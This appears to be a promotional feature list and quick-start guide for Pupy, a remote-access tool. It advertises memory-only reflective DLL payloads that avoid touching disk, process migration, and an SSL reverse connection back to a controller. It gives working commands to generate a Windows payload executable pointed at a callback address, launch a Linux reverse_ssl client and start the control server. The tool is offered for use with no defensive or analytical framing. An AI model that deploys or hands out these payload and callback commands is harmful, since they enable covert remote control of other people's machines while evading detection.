Features :

• On windows, the Pupy payload is compiled as a reflective DLL and the
  whole python interpreter is loaded from memory. Pupy does not touch the
  disk 🙂
• Pupy can reflectively migrate into other processes
• Pupy can remotely import, from memory, pure python packages (.py,
  .pyc) and compiled python C extensions (.pyd). The imported python
  modules do not touch the disk. (.pyd mem import currently work on
  Windows only, .so memory import is not implemented).
• modules are quite simple to write and pupy is easily extensible.
• Pupy uses rpyc and a module can directly access python objects on the remote client
  • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
• communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
• all the non interactive modules can be dispatched on multiple hosts in one command
• Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
• modules can be executed as background jobs
• commands and scripts running on remote hosts are interruptible
• auto-completion and nice colored output 🙂
• commands aliases can be defined in the config

Quick start

In these examples the server is running on a linux host (tested on kali linux) and it’s IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload

for Windows

./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux

pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server

1. eventually edit pupy.conf to change the bind address / port
2. start the pupy server :

 ./pupysh.py

Download & learn more: